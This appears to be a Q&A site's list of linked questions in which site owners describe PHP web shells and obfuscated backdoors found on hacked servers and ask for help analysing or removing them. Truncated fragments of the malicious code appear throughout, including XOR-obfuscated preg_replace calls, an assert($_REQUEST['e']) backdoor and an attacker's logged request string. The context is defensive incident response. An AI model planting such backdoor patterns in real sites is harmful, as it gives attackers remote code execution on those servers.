Linked Questions

I just noticed that the top line of my index.php file got changed to what's below. <?php preg_replace("\xf4\x30\41\x1f\x16\351\x42\x45"^"\xd7\30\xf\64\77\312\53\40","\373\x49\145\xa9\372\xc0\x72\...

Basically a website I am running got hacked in January and sent out a whole bunch of spam mails, traffic went through the roof, so the hosting company disabled the site back then, but that wasn't ...

I'm cleaning up a website after an attack which resulted in many PHP shells being uploaded. I've found and removed the following code: if(isset($_REQUEST['e'])) { $b="ass"."ert";$a=$b($_REQUEST['e']);...

Two days ago a file called "images.php" appeared on a friend's server, which he noticed because it caused errors. The file contained the following. This code is of unknown origin and presumed to be ...

My site is built using Wordpress. One day it stopped working and found an error in one PHP file. When I downloaded that PHP file to see what happened, my antivirus (Microsoft Security Essentials) ...

We have found this on a hacked PHP webserver. It was in a single file. This file was included from somewhere else with @require. That's what we know: This site is running PHP 5.3 The site had ...

Two months ago one of our Wordpress sites was infested through and through. This was at the same time I started working at this company. Our main platform is Plone, but I guess they did some on the ...

$llkas = '-tl#o3s1vnHr_ue*2b\'8c6mx9fya0ip47kgd'; $spvgazs = Array(); $spvgazs[] = $llkas[10].$llkas[15]; $spvgazs[] = $llkas[19].$llkas[19].$llkas[16].$llkas[16].$llkas[27].$llkas[27].$...

I found the following code on my website. What does it do? Is it malicious? <?php @ignore_user_abort(true); @set_time_limit(0); $getherw3423 = "FFS"."W35"."25KK"."Sfj"; $...

My hosting blocked my website because malware, they say. I dived into the (shared) server via ssh and found a file that looks suspicious. This file was in an old, not working installation of wordpress ...

We are continuously receiving following requests on our apache server from the hackers ?1=@ini_set(%22display_errors%22,%220%22);@set_time_limit(0); @set_magic_quotes_runtime(0);echo%20'-%3E%7C';...

I found a PHP file that I don't know where it came from on my server: <?php $ojcsoo = '_-bHft\'dik1x6cn9leapm0y4s7vg5*r8ou#2';$zjdtjcd = Array();$zjdtjcd[] = $ojcsoo[3].$ojcsoo[29];$zjdtjcd[] = $...

My shared hosting with GoDaddy was hacked by injecting a PHP file (deade6.php) that is recreated every time I delete it. I also tried to modify the .htaccess but it gets recreated as follows: <...

An unfriendly visitor left some code on my website. Unfortunately, the coding makes it hard to understand what he wants (probably full control over my server). Any help in deciphering the actual ...

I've found a very strange PHP file with a very long regexp in a customer web server. The file is named 'god.php', and this is their content: <?php preg_replace("/.*/e", "\x28\x65\x76\x61\x6C\x28\...